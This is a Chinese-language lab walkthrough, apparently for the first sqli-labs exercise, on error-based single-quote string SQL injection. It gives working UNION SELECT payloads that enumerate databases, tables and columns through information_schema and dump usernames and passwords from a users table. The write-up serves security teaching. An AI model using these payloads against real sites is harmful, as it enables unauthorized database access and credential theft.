Background -1 SQL注入基础知识
Less -1 基于错误的GET单引号字符型注入
手工注入:
代码审计:
检查完源码之后,我们发现这里传递参数的单引号出现了问题,我们可以尝试进行注入
则说明有3个字段
首先判断是否存在注入,输入?id=1回显正常,输入?id=1'回显异常,这时判断为单引号字符型注入
# 通过联合查询(union)构造payload来获取数据库名 :
?id=-1'union select 1,2,3 --+
?id=-1'union select 1,2,database() --+
?id=-1'union select 1,database(),3 --+
?id=-1'union select database(),2,3 --+
?id=-1' union select 1,2,group_concat(schema_name)from information_schema.schemata--+ 查询所有的数据库
---> "SELECT * FROM users WHERE id='-1'union select 1,2,database() LIMIT 0,1"
# 注:
为什么是-1呢?因为前面查询为假后面才能正常查询.
利用报错注入,union是联合查询,意思是俩个select查询结果合并,我们把左边的设置为空集那么右边的select查询自然成了第一行,这就是union select。
?id=-1' union select 1,2,group_concat(schema_name)from information_schema.schemata--+ 查询所有的库
# 构造payload 来获取数据表
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+
# 注:
group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] ) 将相同的行组合起来
group_concat(table_name)
information_schema:结构用来存储数据库系统信息
information_schema.tables
SCHEMA_NAME(schema_name) 表示数据库名称
TABLE_SCHEMA(table_schema) 表示表所属的数据库名称;
TABLE_NAME(table_name) 表示所属的表的名称
COLUMN_NAME(column_name) 表示字段名
?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security'--+查询字段名
表名查询完了,接着查询users表下的 用户名 密码
# 构造 payload 来获取字段名:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
# 构造 payload 来获取用户名账号和密码:
?id=-1' union select 1,2,group_concat(username,0x3a,password) from users--+
# 注:
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。
?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+ 以波浪号进行分割用户名和密码:
学而不思则罔,思而不学则殆